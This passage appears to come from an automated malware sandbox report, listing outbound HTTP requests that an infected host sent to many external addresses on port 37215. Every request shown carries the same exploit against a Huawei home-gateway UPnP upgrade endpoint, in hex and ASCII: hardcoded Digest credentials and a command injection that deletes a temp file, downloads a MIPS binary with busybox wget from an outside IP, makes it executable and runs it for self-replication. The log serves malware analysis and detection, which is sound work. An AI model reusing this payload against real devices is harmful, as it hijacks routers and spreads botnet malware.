6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1095192.168.2.233894841.110.72.21237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527234077 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1096192.168.2.234604641.79.21.15237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527237892 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1097192.168.2.234248441.203.16.22337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527347088 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1098192.168.2.235478641.71.235.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527357101 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1099192.168.2.2340202157.21.130.20037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527406931 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1100192.168.2.2342292129.224.84.23637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527427912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1101192.168.2.234600441.187.182.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527427912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1102192.168.2.2347522197.135.221.637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527504921 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1103192.168.2.2360820157.239.39.14137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527512074 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1104192.168.2.233972841.254.36.837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527586937 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1105192.168.2.235003041.20.33.23537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527632952 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
